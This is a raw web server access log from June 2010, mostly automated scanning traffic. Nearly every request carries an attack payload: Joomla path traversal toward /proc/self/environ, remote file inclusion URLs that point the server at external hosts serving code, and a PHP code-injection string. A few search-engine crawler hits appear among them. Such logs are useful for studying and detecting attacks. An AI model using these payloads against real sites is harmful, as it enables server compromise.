91.121.145.89 - - [02/Jun/2010:04:16:51 -0500] "GET /*.?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 286 "-""libwww-perl/5.803"
91.121.145.89 - - [02/Jun/2010:04:16:51 -0500] "GET /logs/*.?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-""libwww-perl/5.803"
66.223.110.205 - - [02/Jun/2010:04:18:09 -0500] "GET /logs/*.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
66.223.110.205 - - [02/Jun/2010:04:18:09 -0500] "GET /*.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
208.71.174.218 - - [02/Jun/2010:04:18:12 -0500] "GET /logs/*.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
208.71.174.218 - - [02/Jun/2010:04:18:12 -0500] "GET /*.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.831"
64.151.192.11 - - [02/Jun/2010:04:18:23 -0500] "GET /logs/access_log.1274832000/*.?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-""libwww-perl/5.805"
64.151.192.11 - - [02/Jun/2010:04:18:23 -0500] "GET /*.?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 286 "-""libwww-perl/5.805"
64.151.192.11 - - [02/Jun/2010:04:18:24 -0500] "GET /logs/*.?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-""libwww-perl/5.805"
94.23.0.30 - - [02/Jun/2010:04:18:44 -0500] "GET /logs/*.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.0.30 - - [02/Jun/2010:04:18:45 -0500] "GET /*.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.803"
193.41.235.46 - - [02/Jun/2010:04:18:46 -0500] "GET /logs/*.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
193.41.235.46 - - [02/Jun/2010:04:18:47 -0500] "GET /*.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.808"
80.233.172.42 - - [02/Jun/2010:04:18:55 -0500] "GET /logs/*.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
80.233.172.42 - - [02/Jun/2010:04:18:55 -0500] "GET /*.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.831"
94.23.0.30 - - [02/Jun/2010:04:19:02 -0500] "GET /logs/*.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.0.30 - - [02/Jun/2010:04:19:02 -0500] "GET /*.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.803"
193.41.235.46 - - [02/Jun/2010:04:19:11 -0500] "GET /logs/*.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
193.41.235.46 - - [02/Jun/2010:04:19:11 -0500] "GET /*.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.808"
80.233.172.42 - - [02/Jun/2010:04:19:51 -0500] "GET /logs/*.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
80.233.172.42 - - [02/Jun/2010:04:19:52 -0500] "GET /*.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.831"
120.50.40.133 - - [02/Jun/2010:04:20:19 -0500] "GET /logs/*.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
120.50.40.133 - - [02/Jun/2010:04:20:19 -0500] "GET /*.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.831"
94.23.0.30 - - [02/Jun/2010:04:21:23 -0500] "GET /logs/*.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.0.30 - - [02/Jun/2010:04:21:23 -0500] "GET /*.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.803"
125.248.150.84 - - [02/Jun/2010:04:21:51 -0500] "GET ///bbs///write_comment_update.php?board_skin_path=http://phamsight.com/docs/images/head????? HTTP/1.1" 404 316 "-""Mozilla/5.0"
125.248.150.84 - - [02/Jun/2010:04:21:51 -0500] "GET /logs///bbs///write_comment_update.php?board_skin_path=http://phamsight.com/docs/images/head????? HTTP/1.1" 404 321 "-""Mozilla/5.0"
125.248.150.84 - - [02/Jun/2010:04:21:51 -0500] "GET /logs/access_log.1271548800///bbs///write_comment_update.php?board_skin_path=http://phamsight.com/docs/images/head????? HTTP/1.1" 404 343 "-""Mozilla/5.0"
125.248.150.84 - - [02/Jun/2010:04:21:52 -0500] "GET /logs/access_log.1271548800///bbs///write_comment_update.php?board_skin_path=http://phamsight.com/docs/images/head????? HTTP/1.1" 404 343 "-""Mozilla/5.0"
125.248.150.84 - - [02/Jun/2010:04:21:52 -0500] "GET /logs///bbs///write_comment_update.php?board_skin_path=http://phamsight.com/docs/images/head????? HTTP/1.1" 404 321 "-""Mozilla/5.0"
125.248.150.84 - - [02/Jun/2010:04:21:52 -0500] "GET ///bbs///write_comment_update.php?board_skin_path=http://phamsight.com/docs/images/head????? HTTP/1.1" 404 316 "-""Mozilla/5.0"
121.88.4.141 - - [02/Jun/2010:04:23:51 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
209.51.171.188 - - [02/Jun/2010:04:29:24 -0500] "GET /logs/index2.php?option=com_spsnewsletter=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.813"
209.51.171.188 - - [02/Jun/2010:04:29:24 -0500] "GET /index2.php?option=com_spsnewsletter=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
216.65.69.227 - - [02/Jun/2010:04:29:41 -0500] "GET /logs/index2.php?option=com_spsnewsletter=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
216.65.69.227 - - [02/Jun/2010:04:29:41 -0500] "GET /index2.php?option=com_spsnewsletter=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
193.164.131.82 - - [02/Jun/2010:04:29:54 -0500] "GET /logs/index2.php?option=com_spsnewsletter=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
193.164.131.82 - - [02/Jun/2010:04:29:55 -0500] "GET /index2.php?option=com_spsnewsletter=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
216.65.69.227 - - [02/Jun/2010:04:31:55 -0500] "GET /logs/access_log.1274572800/index2.php?option=com_spsnewsletter=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
216.65.69.227 - - [02/Jun/2010:04:31:55 -0500] "GET /index2.php?option=com_spsnewsletter=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
216.65.69.227 - - [02/Jun/2010:04:31:55 -0500] "GET /logs/index2.php?option=com_spsnewsletter=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
194.32.151.185 - - [02/Jun/2010:04:38:28 -0500] "GET /*.?option=com_jprojectmanager&controller=http://vutanet.com/1.txt? HTTP/1.1" 404 286 "-""Mozilla/5.0"
194.32.151.185 - - [02/Jun/2010:04:38:28 -0500] "GET /*.?option=com_jprojectmanager&controller=http://vutanet.com/1.txt? HTTP/1.1" 404 286 "-""Mozilla/5.0"
194.32.151.185 - - [02/Jun/2010:04:38:28 -0500] "GET /logs/*.?option=com_jprojectmanager&controller=http://vutanet.com/1.txt? HTTP/1.1" 404 291 "-""Mozilla/5.0"
194.32.151.185 - - [02/Jun/2010:04:38:28 -0500] "GET /logs/access_log.1271721600/*.?option=com_jprojectmanager&controller=http://vutanet.com/1.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
194.32.151.185 - - [02/Jun/2010:04:38:28 -0500] "GET /logs/*.?option=com_jprojectmanager&controller=http://vutanet.com/1.txt? HTTP/1.1" 404 291 "-""Mozilla/5.0"
194.32.151.185 - - [02/Jun/2010:04:38:28 -0500] "GET /logs/access_log.1271721600/*.?option=com_jprojectmanager&controller=http://vutanet.com/1.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
194.32.151.185 - - [02/Jun/2010:04:38:30 -0500] "GET /*.?option=com_jprojectmanager&controller=http://vutanet.com/1.txt?? HTTP/1.1" 404 286 "-""Mozilla/5.0"
194.32.151.185 - - [02/Jun/2010:04:38:30 -0500] "GET /logs/*.?option=com_jprojectmanager&controller=http://vutanet.com/1.txt?? HTTP/1.1" 404 291 "-""Mozilla/5.0"
194.32.151.185 - - [02/Jun/2010:04:38:30 -0500] "GET /logs/access_log.1271721600/*.?option=com_jprojectmanager&controller=http://vutanet.com/1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
194.32.151.185 - - [02/Jun/2010:04:38:37 -0500] "GET /*.?option=com_jprojectmanager&controller=http://vutanet.com/1.txt?? HTTP/1.1" 404 286 "-""Mozilla/5.0"
194.32.151.185 - - [02/Jun/2010:04:38:37 -0500] "GET /logs/*.?option=com_jprojectmanager&controller=http://vutanet.com/1.txt?? HTTP/1.1" 404 291 "-""Mozilla/5.0"
194.32.151.185 - - [02/Jun/2010:04:38:37 -0500] "GET /logs/access_log.1271721600/*.?option=com_jprojectmanager&controller=http://vutanet.com/1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
67.195.112.180 - - [02/Jun/2010:04:43:13 -0500] "GET /logs/access_log.1154995200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
91.85.205.218 - - [02/Jun/2010:04:45:52 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""SaladSpoon/ShopSalad 1.0 (Search Engine crawler for ShopSalad.com; http://shopsalad.com/en/partners.html; crawler AT shopsalad.com)"
91.85.205.218 - - [02/Jun/2010:04:45:52 -0500] "GET /costume/costume1.htm HTTP/1.0" 200 2651 "-""SaladSpoon/ShopSalad 1.0 (Search Engine crawler for ShopSalad.com; http://shopsalad.com/en/partners.html; crawler AT shopsalad.com)"
58.230.162.220 - - [02/Jun/2010:04:45:53 -0500] "GET /logs//ask_password.php?dir=http://www.hanzhong21c.com//zboard/icon/respon1.txt? HTTP/1.1" 404 306 "-""Mozilla/5.0"
58.230.162.220 - - [02/Jun/2010:04:45:53 -0500] "GET //ask_password.php?dir=http://www.hanzhong21c.com//zboard/icon/respon1.txt? HTTP/1.1" 404 301 "-""Mozilla/5.0"
58.230.162.220 - - [02/Jun/2010:04:45:54 -0500] "GET /logs/access_log.1271548800//ask_password.php?dir=http://www.hanzhong21c.com//zboard/icon/respon1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
58.230.162.220 - - [02/Jun/2010:04:45:57 -0500] "GET /logs//ask_password.php?dir=http://www.hanzhong21c.com//zboard/icon/respon1.txt? HTTP/1.1" 404 306 "-""Mozilla/5.0"
58.230.162.220 - - [02/Jun/2010:04:45:57 -0500] "GET /logs/access_log.1271548800//ask_password.php?dir=http://www.hanzhong21c.com//zboard/icon/respon1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
58.230.162.220 - - [02/Jun/2010:04:45:57 -0500] "GET //ask_password.php?dir=http://www.hanzhong21c.com//zboard/icon/respon1.txt? HTTP/1.1" 404 301 "-""Mozilla/5.0"
58.230.162.220 - - [02/Jun/2010:04:46:00 -0500] "GET //ask_password.php?dir=http://www.hanzhong21c.com//zboard/icon/respon1.txt? HTTP/1.1" 404 301 "-""Mozilla/5.0"
58.230.162.220 - - [02/Jun/2010:04:46:00 -0500] "GET /logs/access_log.1271548800//ask_password.php?dir=http://www.hanzhong21c.com//zboard/icon/respon1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
58.230.162.220 - - [02/Jun/2010:04:46:00 -0500] "GET /logs//ask_password.php?dir=http://www.hanzhong21c.com//zboard/icon/respon1.txt? HTTP/1.1" 404 306 "-""Mozilla/5.0"
58.230.162.220 - - [02/Jun/2010:04:46:05 -0500] "GET //ask_password.php?dir=http://www.hanzhong21c.com//zboard/icon/respon1.txt? HTTP/1.1" 404 301 "-""Mozilla/5.0"
58.230.162.220 - - [02/Jun/2010:04:46:05 -0500] "GET /logs//ask_password.php?dir=http://www.hanzhong21c.com//zboard/icon/respon1.txt? HTTP/1.1" 404 306 "-""Mozilla/5.0"
58.230.162.220 - - [02/Jun/2010:04:46:05 -0500] "GET /logs/access_log.1271548800//ask_password.php?dir=http://www.hanzhong21c.com//zboard/icon/respon1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
69.175.33.194 - - [02/Jun/2010:04:48:03 -0500] "GET /bbcode_inputs.php?layout=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 301 "-""Mozilla/5.0"
69.175.33.194 - - [02/Jun/2010:04:48:03 -0500] "GET /logs/bbcode_inputs.php?layout=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 306 "-""Mozilla/5.0"
69.175.33.194 - - [02/Jun/2010:04:48:03 -0500] "GET /logs/access_log.1271894400/bbcode_inputs.php?layout=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 328 "-""Mozilla/5.0"
69.175.33.194 - - [02/Jun/2010:04:48:04 -0500] "GET /logs/bbcode_inputs.php?layout=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 306 "-""Mozilla/5.0"
69.175.33.194 - - [02/Jun/2010:04:48:04 -0500] "GET /logs/access_log.1271894400/bbcode_inputs.php?layout=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 328 "-""Mozilla/5.0"
69.175.33.194 - - [02/Jun/2010:04:48:04 -0500] "GET /bbcode_inputs.php?layout=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 301 "-""Mozilla/5.0"
207.46.13.137 - - [02/Jun/2010:04:48:23 -0500] "GET /logs/access_log.1204156800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
58.230.162.220 - - [02/Jun/2010:04:48:50 -0500] "GET //ask_password.php?dir=http://www.hanzhong21c.com//zboard/icon/respon1.txt? HTTP/1.1" 404 301 "-""Mozilla/5.0"
58.230.162.220 - - [02/Jun/2010:04:48:50 -0500] "GET /logs/access_log.1271548800//ask_password.php?dir=http://www.hanzhong21c.com//zboard/icon/respon1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
58.230.162.220 - - [02/Jun/2010:04:48:50 -0500] "GET /logs//ask_password.php?dir=http://www.hanzhong21c.com//zboard/icon/respon1.txt? HTTP/1.1" 404 306 "-""Mozilla/5.0"
66.90.73.48 - - [02/Jun/2010:04:50:06 -0500] "GET /logs/index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
66.90.73.48 - - [02/Jun/2010:04:50:06 -0500] "GET /index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
66.90.73.48 - - [02/Jun/2010:04:50:27 -0500] "GET /logs/bbcode_inputs.php?layout=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 306 "-""libwww-perl/5.831"
66.90.73.48 - - [02/Jun/2010:04:50:27 -0500] "GET /bbcode_inputs.php?layout=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-""libwww-perl/5.831"
58.230.162.220 - - [02/Jun/2010:04:50:59 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
58.230.162.220 - - [02/Jun/2010:04:50:59 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
77.222.56.62 - - [02/Jun/2010:04:52:36 -0500] "GET //expanded.php?conf=http://royx.interfree.it/id.jpg?? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
77.222.56.62 - - [02/Jun/2010:04:52:36 -0500] "GET /logs//expanded.php?conf=http://royx.interfree.it/id.jpg?? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
77.222.56.62 - - [02/Jun/2010:04:53:21 -0500] "GET //myPHPCalendar/admin.php?cal_dir=http://royx.interfree.it/id.jpg?? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
77.222.56.62 - - [02/Jun/2010:04:53:22 -0500] "GET /logs//myPHPCalendar/admin.php?cal_dir=http://royx.interfree.it/id.jpg?? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
66.90.73.48 - - [02/Jun/2010:04:53:53 -0500] "GET /logs/index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
66.90.73.48 - - [02/Jun/2010:04:53:53 -0500] "GET /index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
75.126.138.51 - - [02/Jun/2010:04:56:11 -0500] "GET /logs//estrutura/enquetes//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 322 "-""Mozilla/5.0"
75.126.138.51 - - [02/Jun/2010:04:56:11 -0500] "GET //estrutura/enquetes//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 317 "-""Mozilla/5.0"
75.126.138.51 - - [02/Jun/2010:04:56:11 -0500] "GET /logs/access_log.1271203200//estrutura/enquetes//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 344 "-""Mozilla/5.0"
75.126.138.51 - - [02/Jun/2010:04:56:11 -0500] "GET /logs/access_log.1271289600//estrutura/enquetes//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 344 "-""Mozilla/5.0"
75.126.138.51 - - [02/Jun/2010:04:56:11 -0500] "GET //estrutura/enquetes//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 317 "-""Mozilla/5.0"
75.126.138.51 - - [02/Jun/2010:04:56:11 -0500] "GET /logs//estrutura/enquetes//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 322 "-""Mozilla/5.0"
75.126.138.51 - - [02/Jun/2010:04:56:11 -0500] "GET /logs/access_log.1271203200//estrutura/enquetes//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 344 "-""Mozilla/5.0"
75.126.138.51 - - [02/Jun/2010:04:56:11 -0500] "GET /logs/access_log.1271289600//estrutura/enquetes//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 344 "-""Mozilla/5.0"
62.44.82.61 - - [02/Jun/2010:04:56:13 -0500] "GET /logs//estrutura/enquetes//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 322 "-""Mozilla/5.0"
62.44.82.61 - - [02/Jun/2010:04:56:13 -0500] "GET //estrutura/enquetes//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 317 "-""Mozilla/5.0"
62.44.82.61 - - [02/Jun/2010:04:56:13 -0500] "GET /logs/access_log.1271203200//estrutura/enquetes//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 344 "-""Mozilla/5.0"
62.44.82.61 - - [02/Jun/2010:04:56:13 -0500] "GET /logs/access_log.1271289600//estrutura/enquetes//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 344 "-""Mozilla/5.0"
200.135.228.230 - - [02/Jun/2010:04:57:03 -0500] "GET /logs/access_log.1271203200//estrutura/enquetes//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 344 "-""Mozilla/5.0"
200.135.228.230 - - [02/Jun/2010:04:57:03 -0500] "GET /logs//estrutura/enquetes//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 322 "-""Mozilla/5.0"
200.135.228.230 - - [02/Jun/2010:04:57:03 -0500] "GET /logs/access_log.1271289600//estrutura/enquetes//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 344 "-""Mozilla/5.0"
200.135.228.230 - - [02/Jun/2010:04:57:03 -0500] "GET //estrutura/enquetes//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 317 "-""Mozilla/5.0"
66.90.73.48 - - [02/Jun/2010:04:58:17 -0500] "GET /logs/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
66.90.73.48 - - [02/Jun/2010:04:58:17 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
91.121.153.152 - - [02/Jun/2010:04:59:04 -0500] "GET /logs/*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
91.121.153.152 - - [02/Jun/2010:04:59:05 -0500] "GET /*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.803"
91.121.153.152 - - [02/Jun/2010:04:59:09 -0500] "GET /logs/*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
91.121.153.152 - - [02/Jun/2010:04:59:09 -0500] "GET /*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.803"
66.90.73.48 - - [02/Jun/2010:04:59:11 -0500] "GET /logs/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
66.90.73.48 - - [02/Jun/2010:04:59:11 -0500] "GET /index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
87.250.255.243 - - [02/Jun/2010:04:59:14 -0500] "GET /logs/access_log.1227052800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
62.44.82.61 - - [02/Jun/2010:04:59:32 -0500] "GET //estrutura/enquetes//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 317 "-""Mozilla/5.0"
62.44.82.61 - - [02/Jun/2010:04:59:32 -0500] "GET /logs//estrutura/enquetes//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 322 "-""Mozilla/5.0"
62.44.82.61 - - [02/Jun/2010:04:59:32 -0500] "GET /logs/access_log.1271808000//estrutura/enquetes//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 344 "-""Mozilla/5.0"
62.44.82.61 - - [02/Jun/2010:04:59:41 -0500] "GET /logs/access_log.1271548800//estrutura/enquetes//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 344 "-""Mozilla/5.0"
81.80.122.44 - - [02/Jun/2010:05:00:31 -0500] "GET /logs/access_log.1222905600//Neos_Chronos/header.php?base_folder=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
81.80.122.44 - - [02/Jun/2010:05:00:32 -0500] "GET //Neos_Chronos/header.php?base_folder=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
81.80.122.44 - - [02/Jun/2010:05:00:32 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
81.80.122.44 - - [02/Jun/2010:05:01:05 -0500] "GET /logs/access_log.1243123200//Neos_Chronos/header.php?base_folder=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
